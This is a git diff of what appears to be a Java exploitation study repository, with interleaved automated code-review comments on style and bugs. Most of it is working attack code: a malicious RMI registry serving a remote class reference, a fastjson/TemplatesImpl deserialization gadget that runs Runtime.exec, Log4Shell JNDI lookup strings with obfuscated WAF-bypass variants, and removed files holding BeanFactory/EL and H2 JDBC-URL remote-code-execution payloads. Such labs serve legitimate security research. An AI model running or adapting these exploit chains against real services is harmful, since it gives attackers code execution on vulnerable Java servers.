@@ -0,0 +1,18 @@
+import com.sun.jndi.rmi.registry.ReferenceWrapper;
+
+import java.rmi.AlreadyBoundException;
+import java.rmi.RemoteException;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+import javax.naming.NamingException;
+import javax.naming.Reference;
+
+public class RMIServer {
+ public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
+ Registry registry = LocateRegistry.createRegistry(1099);
+ // factory表示加载的类的url和类名,所以恶意类文件必须以全类名命名
+ Reference reference = new Reference("Calc1233", "Calc", "http://127.0.0.1:7777/");
+ ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
+ registry.bind("Calc123", referenceWrapper);
+ }
+}
diff --git a/JNDI/JNDI/src/main/java/remoteObj/Hello.java b/JNDI/JNDI/src/main/java/remoteObj/Hello.java
new file mode 100644
index 0000000..83be131
--- /dev/null
+++ b/JNDI/JNDI/src/main/java/remoteObj/Hello.java
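Review bot: `4905912898345647071L` in `ref.newCall((RemoteObject) registry, operations, 0, 4905912898345647071L)` is an unexplained magic number; hoist it into a named `private static final long` constant with a comment saying where the value comes from. The reflective field variables are misspelled and snake_cased (`ref_filed`, `operations_filed`, `enableReplace_filed`); Java convention is `refField`, `operationsField`, `enableReplaceField`. `Constructor constructor` is a raw type — `getDeclaredConstructor()` on `UnicastRemoteObject.class` returns `Constructor<UnicastRemoteObject>`, which also removes the need to cast `newInstance()`. `import java.rmi.server.*;` is a wildcard import; list the classes actually used (`ObjID`, `Operation`, `RemoteCall`, `RemoteObject`, `RemoteObjectInvocationHandler`, `RMIServerSocketFactory`, `UnicastRemoteObject`).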
@@ -0,0 +1,8 @@
+package remoteObj;
+
+import java.rmi.Remote;
+import java.rmi.RemoteException;
+
+public interface Hello extends Remote {
+ public String hello(String name) throws RemoteException;
+}
diff --git a/JNDI/JNDI/src/main/java/remoteObj/HelloImpl.java b/JNDI/JNDI/src/main/java/remoteObj/HelloImpl.java
new file mode 100644
index 0000000..291d8c1
--- /dev/null
+++ b/JNDI/JNDI/src/main/java/remoteObj/HelloImpl.java
@@ -0,0 +1,14 @@
+package remoteObj;
+
+import java.rmi.RemoteException;
+import java.rmi.server.UnicastRemoteObject;
+
+public class HelloImpl extends UnicastRemoteObject implements Hello {
+ public HelloImpl() throws RemoteException {
+ }
+
+ @Override
+ public String hello(String name) throws RemoteException {
+ return "hello " + name;
+ }
+}
diff --git a/JNDI/JNDI/src/main/java/tools/ClassByteGen.java b/JNDI/JNDI/src/main/java/tools/ClassByteGen.java
new file mode 100644
index 0000000..9275013
--- /dev/null
+++ b/JNDI/JNDI/src/main/java/tools/ClassByteGen.java
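Review bot: `public` on `hello` in the `Hello` interface is redundant — interface methods are implicitly public — and `HelloImpl`'s empty constructor exists only to declare `throws RemoteException` for the `UnicastRemoteObject` superclass constructor, which is not obvious to a reader; a one-line comment such as `// explicit only because the UnicastRemoteObject constructor throws RemoteException` would explain it.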
@@ -0,0 +1,29 @@
+package tools;
+
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtConstructor;
+
+public class ClassByteGen {
+ public static byte[] getBytes(String code, String className) throws Exception {
+// String Abstract = "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";
+ ClassPool pool = ClassPool.getDefault();
+// pool.importPackage(Abstract);
+ pool.importPackage("java.io");
+ pool.importPackage("java.nio.file");
+ pool.importPackage("java.lang.reflect");
+ pool.importPackage("java.nio.charset");
+ pool.importPackage("java.util");
+// pool.insertClassPath(Abstract);
+// pool.insertClassPath("java.nio");
+ CtClass ctClass = pool.makeClass(className);
+// ctClass.setSuperclass(pool.get(Abstract));
+ CtConstructor ctConstructor = ctClass.makeClassInitializer();
+ ctConstructor.setBody(code);
+// CtConstructor ctConstructor1 = new CtConstructor(new CtClass[]{}, ctClass);
+// ctConstructor1.setBody(code);
+// ctClass.addConstructor(ctConstructor1);
+ ctClass.writeFile("ClassByteGen");
+ return ctClass.toBytecode();
+ }
+}
diff --git a/JNDI/JNDI/src/main/java/tools/InvocationHandlerImpl.java b/JNDI/JNDI/src/main/java/tools/InvocationHandlerImpl.java
new file mode 100644
index 0000000..7c15d95
--- /dev/null
+++ b/JNDI/JNDI/src/main/java/tools/InvocationHandlerImpl.java
@@ -0,0 +1,19 @@
+package tools;
+
+import java.io.Serializable;
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Method;
+
+// 动态代理,实现对象接口转化
+public class InvocationHandlerImpl implements InvocationHandler, Serializable {
+ private Object object;
+
+ public InvocationHandlerImpl(Object obj) {
+ this.object = obj;
+ }
+
+ @Override
+ public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
+ return null;
+ }
+}
diff --git a/JNDI/JNDI/src/main/java/tools/Payload.java b/JNDI/JNDI/src/main/java/tools/Payload.java
new file mode 100644
index 0000000..5396724
--- /dev/null
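Review bot: `getBytes` has an undocumented side effect: `ctClass.writeFile("ClassByteGen")` writes the generated class file to disk under a `ClassByteGen` directory on every call, in addition to returning the bytes; state that in a Javadoc on the method, or make the output directory a parameter so callers opt in. The commented-out `Abstract`/`setSuperclass`/`ctConstructor1` lines are dead code and should be deleted rather than kept as comments. In `InvocationHandlerImpl`, `object` is assigned once and never read — `invoke` returns `null` for every call — so declare it `private final Object object;` and add a comment on the class saying what it is for (presumably to carry `object` through serialization, since nothing on the page reads it; confirm with the author).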
+++ b/JNDI/JNDI/src/main/java/tools/Payload.java
@@ -0,0 +1,10 @@
+package tools;
+
+public abstract class Payload {
+// public Templates getTemplates(byte[] byteCode, String bytePath) throws Exception {
+// Templates templates = TemplatesGen.getTemplates(byteCode, bytePath);
+// return templates;
+// }
+
+ public abstract String getPayload(byte[] byteCode, String bytePath) throws Exception;
+}
diff --git a/JNDI/JNDI/src/main/java/tools/PayloadGen.java b/JNDI/JNDI/src/main/java/tools/PayloadGen.java
new file mode 100644
index 0000000..475286b
--- /dev/null
+++ b/JNDI/JNDI/src/main/java/tools/PayloadGen.java
@@ -0,0 +1,23 @@
+package tools;
+
+import com.alibaba.fastjson.JSONArray;
+
+import javax.management.BadAttributeValueExpException;
+import javax.xml.transform.Templates;
+
+public class PayloadGen {
+ public static Object getPayload() throws Exception {
+ String code = "{\n" +
+ " Runtime.getRuntime().exec(\"calc\");\n" +
+ " }";
+ byte[] bytes = ClassByteGen.getBytes(code, "AAAA");
+ Templates templates = TemplatesGen.getTemplates(bytes, null);
+ JSONArray jsonArray = new JSONArray();
+ jsonArray.add(templates);
+
+ BadAttributeValueExpException bad = new BadAttributeValueExpException("aaa");
+ ReflectTools.setFieldValue(bad, "val", jsonArray);
+
+ return bad;
+ }
+}
diff --git a/JNDI/JNDI/src/main/java/tools/ReflectTools.java b/JNDI/JNDI/src/main/java/tools/ReflectTools.java
new file mode 100644
index 0000000..e064009
--- /dev/null
+++ b/JNDI/JNDI/src/main/java/tools/ReflectTools.java
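Review bot: `Payload` declares `public abstract String getPayload(byte[] byteCode, String bytePath)`, but the only producer in this commit, `PayloadGen.getPayload()`, is static, takes no arguments and returns `Object`, and nothing implements `Payload`; either make `PayloadGen` implement it with a matching signature or delete the abstract class together with its commented-out `getTemplates` block, which is dead code. If `Payload` stays, give it a Javadoc saying what `byteCode` and `bytePath` are and that `bytePath` is only read when `byteCode` is null, which is how `TemplatesGen.getTemplates` treats the same pair.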
@@ -0,0 +1,71 @@
+package tools;
+
+import javassist.CannotCompileException;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtField;
+
+import java.io.*;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Modifier;
+import java.lang.reflect.Proxy;
+import java.util.Base64;
+
+public class ReflectTools {
+ public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException {
+ Class aClass = obj.getClass();
+ Field field = null;
+ try {
+ field = aClass.getDeclaredField(fieldName);
+ } catch (NoSuchFieldException e) {
+ aClass = aClass.getSuperclass();
+ }
+ field.setAccessible(true);
+ field.set(obj, value);
+ }
+
+ // 生成不继承Serializable接口的Class,防止因suid不一样报错
+ public static Class makeClass(String className, String suid) throws ClassNotFoundException, CannotCompileException {
+ ClassPool pool = ClassPool.getDefault();
+ CtClass ctClass = pool.makeClass(className);
+
+ if (suid != null) {
+ // 添加 serialVersionUID 字段并指定其值
+ CtField serialVersionUIDField = new CtField(CtClass.longType, "serialVersionUID", ctClass);
+ serialVersionUIDField.setModifiers(Modifier.PRIVATE | Modifier.STATIC | Modifier.FINAL); // 设置为private static final
+ ctClass.addField(serialVersionUIDField, suid); // 设置 serialVersionUID 值为 1L
+ }
+
+ Class aClass = ctClass.toClass();
+ return aClass;
+ }
+
+ public static byte[] ser2bytes(Object obj) throws IOException {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(baos);
+ oos.writeObject(obj);
+ return baos.toByteArray();
+ }
+
+ public static void ser2file(Object obj, String fileName) throws IOException {
+ FileOutputStream fos = new FileOutputStream(fileName);
+ ObjectOutputStream oos = new ObjectOutputStream(fos);
+ oos.writeObject(obj);
+ }
+
+ public static Object deser(byte[] bytes, String base64) throws IOException, ClassNotFoundException {
+ if (bytes != null) {
+ ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
+ ObjectInputStream ois = new ObjectInputStream(bais);
+ return ois.readObject();
+ }else {
+ byte[] decode = Base64.getDecoder().decode(base64);
+ ByteArrayInputStream bais = new ByteArrayInputStream(decode);
+ ObjectInputStream ois = new ObjectInputStream(bais);
+ return ois.readObject();
+ }
+ }
+
+
+}
diff --git a/JNDI/JNDI/src/main/java/tools/TemplatesGen.java b/JNDI/JNDI/src/main/java/tools/TemplatesGen.java
new file mode 100644
index 0000000..5fbf00d
--- /dev/null
+++ b/JNDI/JNDI/src/main/java/tools/TemplatesGen.java
@@ -0,0 +1,35 @@
+package tools;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import javassist.CannotCompileException;
+import javassist.ClassPool;
+import javassist.CtClass;
+
+import javax.xml.transform.Templates;
+import java.io.IOException;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+
+public class TemplatesGen {
+ public static Templates getTemplates(byte[] byteCode, String bytePath) throws IOException, IllegalAccessException, CannotCompileException {
+ byte[] evilBytes;
+ if (byteCode != null) {
+ evilBytes = byteCode;
+ }else {
+ evilBytes = Files.readAllBytes(Paths.get(bytePath));
+ }
+ TemplatesImpl templates = new TemplatesImpl();
+ ClassPool pool = ClassPool.getDefault();
+ CtClass ctClass = pool.makeClass("useless");
+ byte[] useless = ctClass.toBytecode();
+ ReflectTools.setFieldValue(templates, "_name", "1diot9");
+ ReflectTools.setFieldValue(templates, "_class", null);
+// ReflectTools.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
+ ReflectTools.setFieldValue(templates, "_transletIndex", 0);
+ // 修改bytecodes数量和transletIndex,这样就不用继承AbstractTranslet
+ ReflectTools.setFieldValue(templates, "_bytecodes", new byte[][]{evilBytes, useless});
+ return templates;
+ }
+
+}
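Review bot: `setFieldValue` cannot find a field declared on a superclass: when `getDeclaredField` throws, the catch assigns `aClass = aClass.getSuperclass()` but never retries, so `field` is still `null` and `field.setAccessible(true)` fails with `NullPointerException`; walk the hierarchy in a loop and throw a descriptive exception when nothing matches, as sketched below, and fix the comment `// 设置 serialVersionUID 值为 1L` in `makeClass`, which says 1L while the value written is the `suid` argument. `ser2bytes` and `ser2file` never close their `ObjectOutputStream`, and `ser2file` leaks the `FileOutputStream`; put each in try-with-resources. `deser` builds a plain `ObjectInputStream` over caller-supplied bytes with no `ObjectInputFilter` (`ObjectInputStream.setObjectInputFilter`, Java 9+), which is the unprotected sink this study code exists to exercise — a comment stating that the omission is deliberate would keep it from being copied as-is into non-test code. In `TemplatesGen`, `TransformerFactoryImpl` is referenced only from a commented-out line, so that import is unused.
```java
 public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException {
     Field field = null;
     // getDeclaredField() only sees the exact class, so walk up until the field is found
     for (Class<?> c = obj.getClass(); c != null && field == null; c = c.getSuperclass()) {
         try {
             field = c.getDeclaredField(fieldName);
         } catch (NoSuchFieldException ignored) {
             // not declared on this class; keep climbing
         }
     }
     if (field == null) {
         throw new IllegalArgumentException("no field '" + fieldName + "' in " + obj.getClass().getName());
     }
     field.setAccessible(true);
     field.set(obj, value);
 }
```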
diff --git a/JNDI/JNDI_vul/.idea/encodings.xml b/JNDI/JNDI_vul/.idea/encodings.xml deleted file mode 100644 index 8c3a518..0000000 --- a/JNDI/JNDI_vul/.idea/encodings.xml +++ /dev/null @@ -1,11 +0,0 @@ - - - - - - - - - - - \ No newline at end of file diff --git a/JNDI/JNDI_vul/pom.xml b/JNDI/JNDI_vul/pom.xml deleted file mode 100644 index d79e385..0000000 --- a/JNDI/JNDI_vul/pom.xml +++ /dev/null @@ -1,93 +0,0 @@ - - - 4.0.0 - - org.example - JNDI - 1.0-SNAPSHOT - pom - - server - client - - - - 8 - 8 - UTF-8 - - - - - com.unboundid - unboundid-ldapsdk - 3.2.0 - test - - - com.unboundid - unboundid-ldapsdk - 3.2.0 - compile - - - org.apache.tomcat - tomcat-catalina - 8.5.51 - - - org.apache.tomcat - tomcat-jasper - 8.5.51 - - - commons-collections - commons-collections - 3.2.1 - - - - org.apache.xbean - xbean-reflect - 4.18 - - - - - com.h2database - h2 - 2.2.220 - - - - - - commons-dbcp - commons-dbcp - 1.4 - - - - commons-pool - commons-pool - 1.5.4 - - - - - org.apache.commons - commons-dbcp2 - 2.9.0 - - - - - org.apache.tomcat - tomcat-jdbc - 8.5.51 - - - - \ No newline at end of file diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/EL_test.java b/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/EL_test.java deleted file mode 100644 index 49ee34e..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/EL_test.java +++ /dev/null @@ -1,15 +0,0 @@ -package factory.beanFactory; - -import javax.el.ELProcessor; - -public class EL_test { - public static void main(String[] args) { - ELProcessor elProcessor = new ELProcessor(); - // 将 Runtime 对象注入到 EL 上下文中 - elProcessor.defineBean("runtime", Runtime.getRuntime()); - - // 使用 EL 表达式调用 exec 方法 - String expression = "${runtime.exec('calc')}"; - elProcessor.eval(expression); - } -} 
diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/JNDIBypassHighJavaServerEL.java b/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/JNDIBypassHighJavaServerEL.java deleted file mode 100644 index 2ac7315..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/JNDIBypassHighJavaServerEL.java +++ /dev/null @@ -1,31 +0,0 @@ -package factory.beanFactory; - -import com.sun.jndi.rmi.registry.ReferenceWrapper; -import org.apache.naming.ResourceRef; - -import javax.naming.StringRefAddr; -import java.rmi.registry.LocateRegistry; -import java.rmi.registry.Registry; - -// JNDI 高版本 jdk 绕过服务端,用 bind 的方式 -public class JNDIBypassHighJavaServerEL { - public static void main(String[] args) throws Exception { - System.out.println("[*]Evil RMI Server is Listening on port: 1099"); - Registry registry = LocateRegistry.createRegistry(1099); - - // 实例化Reference,指定目标类为javax.el.ELProcessor,工厂类为org.apache.naming.factory.BeanFactory - ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", - true,"org.apache.naming.factory.BeanFactory",null); - - // 强制将'x'属性的setter从'setX'变为'eval', 详细逻辑见BeanFactory.getObjectInstance代码 - ref.add(new StringRefAddr("forceString", "x=eval")); - - // 利用表达式执行命令 - ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\")" + - ".newInstance().getEngineByName(\"JavaScript\")" + - ".eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")")); - System.out.println("[*]Evil command: calc"); - ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref); - registry.bind("Object", referenceWrapper); -} -} \ No newline at end of file diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/trustSerialFalse/ldapserver.java b/JNDI/JNDI_vul/server/src/main/java/factory/trustSerialFalse/ldapserver.java deleted file mode 100644 index 65adc37..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/trustSerialFalse/ldapserver.java +++ /dev/null 
@@ -1,61 +0,0 @@ -package factory.trustSerialFalse; - -import com.unboundid.ldap.listener.InMemoryDirectoryServer; -import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; -import com.unboundid.ldap.listener.InMemoryListenerConfig; -import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; -import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor; -import com.unboundid.ldap.sdk.Entry; -import com.unboundid.ldap.sdk.LDAPResult; -import com.unboundid.ldap.sdk.ResultCode; - -import javax.net.ServerSocketFactory; -import javax.net.SocketFactory; -import javax.net.ssl.SSLSocketFactory; -import java.net.InetAddress; - -public class ldapserver { - public static void main(String[] args) { - try { - InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig("dc=example,dc=com"); - config.setListenerConfigs(new InMemoryListenerConfig( - "listen", - InetAddress.getByName("0.0.0.0"), - 1389, - ServerSocketFactory.getDefault(), - SocketFactory.getDefault(), - (SSLSocketFactory) SSLSocketFactory.getDefault())); - - config.addInMemoryOperationInterceptor(new OperationInterceptor()); - InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); - System.out.println("[LDAP] Listening on 0.0.0.0:1389"); - ds.startListening(); - } catch (Exception e) { - e.printStackTrace(); - } - } - //tomcat-jdbc + h2 - //decodeReference 绕过decodeObject,打本地工厂 - public static class OperationInterceptor extends InMemoryOperationInterceptor { - - @Override - public void processSearchResult(InMemoryInterceptedSearchResult searchResult) { - String base = searchResult.getRequest().getBaseDN(); - Entry e = new Entry(base); - e.addAttribute("objectClass","javaNamingReference"); - - e.addAttribute("javaClassName", "javax.sql.DataSource"); - e.addAttribute("javaFactory","org.apache.tomcat.jdbc.pool.DataSourceFactory"); - String JDBC_URL = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS EXEC AS 'String shellexec(String cmd) 
throws java.io.IOException {Runtime.getRuntime().exec(cmd)\\;return \"1\"\\;}'\\;CALL EXEC ('calc')"; - e.addAttribute("javaReferenceAddress",new String[]{"/0/url/"+JDBC_URL,"/1/driverClassName/org.h2.Driver","/2/username/Squirt1e","/3/password/Squirt1e","/4/initialSize/1"}); - - - try { - searchResult.sendSearchEntry(e); - searchResult.setResult(new LDAPResult(0, ResultCode.SUCCESS)); - } catch (Exception ex) { - ex.printStackTrace(); - } - } - } -} diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/dbcp.java b/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/dbcp.java deleted file mode 100644 index bb0045b..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/dbcp.java +++ /dev/null 
@@ -1,48 +0,0 @@ -package factory.withJDBC.rmi; - -import com.sun.jndi.rmi.registry.ReferenceWrapper; - -import javax.naming.NamingException; -import javax.naming.Reference; -import javax.naming.StringRefAddr; -import java.rmi.AlreadyBoundException; -import java.rmi.RemoteException; -import java.rmi.registry.LocateRegistry; -import java.rmi.registry.Registry; - -public class dbcp { - public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException { - Registry registry = LocateRegistry.createRegistry(1099); - Reference reference = commons_dbcp2_RCE(); - ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); - registry.bind("Object", referenceWrapper); - - - } - - private static Reference tomcat_dbcp2_RCE(){ - return dbcpByFactory("org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory"); - } - private static Reference tomcat_dbcp1_RCE(){ - return dbcpByFactory("org.apache.tomcat.dbcp.dbcp.BasicDataSourceFactory"); - } - private static Reference commons_dbcp2_RCE(){ - return dbcpByFactory("org.apache.commons.dbcp2.BasicDataSourceFactory"); - } - private static Reference commons_dbcp1_RCE(){ - return dbcpByFactory("org.apache.commons.dbcp.BasicDataSourceFactory"); - } - private static Reference dbcpByFactory(String factory){ - Reference ref = new Reference("javax.sql.DataSource",factory,null); - String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" + - "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" + - "java.lang.Runtime.getRuntime().exec('calc')\n" + - "$$\n"; - ref.add(new StringRefAddr("driverClassName","org.h2.Driver")); - ref.add(new StringRefAddr("url",JDBC_URL)); - ref.add(new StringRefAddr("username","root")); - ref.add(new StringRefAddr("password","password")); - ref.add(new StringRefAddr("initialSize","1")); - return ref; - } -} 
diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/tomcat_dbcp.java b/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/tomcat_dbcp.java deleted file mode 100644 index dfd49ea..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/tomcat_dbcp.java +++ /dev/null @@ -1,36 +0,0 @@ -package factory.withJDBC.rmi; - -import com.sun.jndi.rmi.registry.ReferenceWrapper; - -import javax.naming.Reference; -import javax.naming.StringRefAddr; -import java.rmi.registry.LocateRegistry; -import java.rmi.registry.Registry; - -public class tomcat_dbcp { - public static void main(String[] args) throws Exception { - Registry registry = LocateRegistry.createRegistry(1099); - Reference reference = tomcat_JDBC_RCE(); - ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); - registry.bind("Object", referenceWrapper); - } - - - private static Reference tomcat_JDBC_RCE(){ - return dbcpByFactory("org.apache.tomcat.jdbc.pool.DataSourceFactory"); - } - private static Reference dbcpByFactory(String factory){ - Reference ref = new Reference("javax.sql.DataSource",factory,null); - String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" + - "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" + - "java.lang.Runtime.getRuntime().exec('calc')\n" + - "$$\n"; - ref.add(new StringRefAddr("driverClassName","org.h2.Driver")); - ref.add(new StringRefAddr("url",JDBC_URL)); - ref.add(new StringRefAddr("username","root")); - ref.add(new StringRefAddr("password","password")); - ref.add(new StringRefAddr("initialSize","1")); - return ref; - } - -} diff --git a/hessian/HessianStudy/.gitignore b/JNDI/Log4j2/.gitignore similarity index 100% rename from hessian/HessianStudy/.gitignore rename to JNDI/Log4j2/.gitignore diff --git a/hessian/dubbo/.idea/.gitignore b/JNDI/Log4j2/.idea/.gitignore similarity index 100% rename from hessian/dubbo/.idea/.gitignore rename to JNDI/Log4j2/.idea/.gitignore 
diff --git a/JNDI/Log4j2/.idea/copilot.data.migration.agent.xml b/JNDI/Log4j2/.idea/copilot.data.migration.agent.xml new file mode 100644 index 0000000..4ea72a9 --- /dev/null +++ b/JNDI/Log4j2/.idea/copilot.data.migration.agent.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/.idea/copilot.data.migration.ask.xml b/JNDI/Log4j2/.idea/copilot.data.migration.ask.xml new file mode 100644 index 0000000..7ef04e2 --- /dev/null +++ b/JNDI/Log4j2/.idea/copilot.data.migration.ask.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/.idea/copilot.data.migration.ask2agent.xml b/JNDI/Log4j2/.idea/copilot.data.migration.ask2agent.xml new file mode 100644 index 0000000..1f2ea11 --- /dev/null +++ b/JNDI/Log4j2/.idea/copilot.data.migration.ask2agent.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/.idea/copilot.data.migration.edit.xml b/JNDI/Log4j2/.idea/copilot.data.migration.edit.xml new file mode 100644 index 0000000..8648f94 --- /dev/null +++ b/JNDI/Log4j2/.idea/copilot.data.migration.edit.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/hessian/dubbo/.idea/encodings.xml b/JNDI/Log4j2/.idea/encodings.xml similarity index 100% rename from hessian/dubbo/.idea/encodings.xml rename to JNDI/Log4j2/.idea/encodings.xml diff --git a/JNDI/JNDI_vul/.idea/misc.xml b/JNDI/Log4j2/.idea/misc.xml similarity index 100% rename from JNDI/JNDI_vul/.idea/misc.xml rename to JNDI/Log4j2/.idea/misc.xml diff --git a/JNDI/Log4j2/.idea/vcs.xml b/JNDI/Log4j2/.idea/vcs.xml new file mode 100644 index 0000000..b2bdec2 --- /dev/null +++ b/JNDI/Log4j2/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/pom.xml b/JNDI/Log4j2/pom.xml new file mode 100644 index 0000000..4440633 --- /dev/null +++ b/JNDI/Log4j2/pom.xml 
@@ -0,0 +1,44 @@ + + + 4.0.0 + + com.test + Log4j2 + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + 2.14.1 + 2.15.0 + + + + + org.apache.logging.log4j + log4j-core + ${log4j2.version1} + + + org.springframework.boot + spring-boot-starter-web + 2.7.15 + + + org.springframework.boot + spring-boot-starter-logging + + + + + org.aspectj + aspectjweaver + 1.9.4 + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/src/main/java/com/example/App.java b/JNDI/Log4j2/src/main/java/com/example/App.java new file mode 100644 index 0000000..469545a --- /dev/null +++ b/JNDI/Log4j2/src/main/java/com/example/App.java @@ -0,0 +1,35 @@ +package com.example; + +import org.apache.logging.log4j.Level; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; +import org.apache.logging.log4j.core.config.Configurator; + +public class App { + private static final Logger logger = LogManager.getLogger(App.class); + + public static void main(String[] args) { + /* 临时修改记录的日志等级 */ + Configurator.setLevel("com.example.App", Level.DEBUG); + + String username = "${sys:user.name}"; + String str2 = "${sys:java.version}"; + String vul = "${jndi:ldap://127.0.0.1:50389/b67a28}"; + vul = "${jndi:ldap://127.0.0.1:50389/7df78d}"; +// logger.trace("跟踪信息"); +// logger.debug("调试信息"); +// logger.info("应用启动"); +// logger.warn("警告示例"); +// logger.error("错误示例"); +// logger.fatal("致命错误示例"); +// logger.trace("{}", username); +// logger.info("{}", str2); + logger.info("{}", vul); +// logger.error("{}",vul); + try { + int x = 1 / 0; + } catch (Exception e) { + logger.error("发生异常", e); + } + } +} diff --git a/JNDI/Log4j2/src/main/java/com/example/BypassWaf.java b/JNDI/Log4j2/src/main/java/com/example/BypassWaf.java new file mode 100644 index 0000000..7232598 --- /dev/null +++ b/JNDI/Log4j2/src/main/java/com/example/BypassWaf.java 
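Review bot: The log4j-core version this pom resolves, 2.14.1, is affected by CVE-2021-44228 (JNDI lookups evaluated inside logged messages), which is evidently the point of this lab, but nothing in the pom says so, and the second version property (2.15.0) appears to be declared with nothing referencing it. A later reader grepping for pinned log4j versions cannot tell a deliberate target from an oversight; add a comment beside the property, `<!-- intentionally vulnerable: log4j-core 2.14.1, CVE-2021-44228; swap to the 2.15.0 property to compare -->`, or drop the unused property. Element names are stripped in this view, so which property is referenced is inferred from the `${log4j2.version1}` text and the two values.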
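Review bot: `vul` is assigned `.../b67a28` and immediately overwritten with `.../7df78d` in `App.main`, so the first assignment is dead code; keep a single constant or take the path from the command line, e.g. `String vul = args.length > 0 ? args[0] : "${jndi:ldap://127.0.0.1:50389/7df78d}";`. The lookup is resolved only because this commit's pom pins log4j-core 2.14.1 (the 2.15.0 property would presumably not resolve it, since that release disabled message lookups by default), so a comment on the `logger.info("{}", vul)` line such as `// needs log4j-core < 2.15.0: message lookups enabled` saves the next person a confused debugging session. The block of commented-out `logger.trace/debug/info/...` calls should be deleted rather than kept as a menu.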
@@ -0,0 +1,31 @@
+package com.example;
+
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+
+
+public class BypassWaf {
+ private static final Logger logger = LogManager.getLogger(BypassWaf.class);
+
+ public static void main(String[] args) {
+// String test5 = "${a:\\-b}";
+// logger.error("{}", test5);
+// String test2 = "${a:\\-b123:-xyz}";
+// logger.error("{}", test2);
+// String test4 = "${a:\\-b123:-xyz:-qwe}";
+// logger.error("{}", test4);
+// String test3 = "${a:-b}";
+// logger.error("{}", test3);
+// String test6 = "${a:-b123:-xyz}";
+// logger.error("{}", test6);
+// String test7 = "${a:b123:-xyz321:-qwe}";
+// logger.error("{}", test7);
+// String test8 = "${sys:java.version:-xyz123}";
+// logger.error("{}", test8);
+// String test1 = "${sys:${a:-j${proto:-a}va.version}}${d:e}";
+// logger.fatal("{}", test1);
+ String host = "ldap://127.0.0.1:50389/b67a28";
+ String vul1 = String.format("${jndi:%s}", host);
+ logger.error("{}", vul1);
+ }
+}
diff --git a/JNDI/Log4j2/src/main/java/com/example/spring/WebApplication.java b/JNDI/Log4j2/src/main/java/com/example/spring/WebApplication.java
new file mode 100644
index 0000000..bb2acba
--- /dev/null
+++ b/JNDI/Log4j2/src/main/java/com/example/spring/WebApplication.java
@@ -0,0 +1,11 @@
+package com.example.spring;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class WebApplication {
+ public static void main(String[] args) {
+ SpringApplication.run(WebApplication.class, args);
+ }
+}
diff --git a/JNDI/Log4j2/src/main/java/com/example/spring/controller/IndexController.java b/JNDI/Log4j2/src/main/java/com/example/spring/controller/IndexController.java
new file mode 100644
index 0000000..955ae0f
--- /dev/null
+++ b/JNDI/Log4j2/src/main/java/com/example/spring/controller/IndexController.java
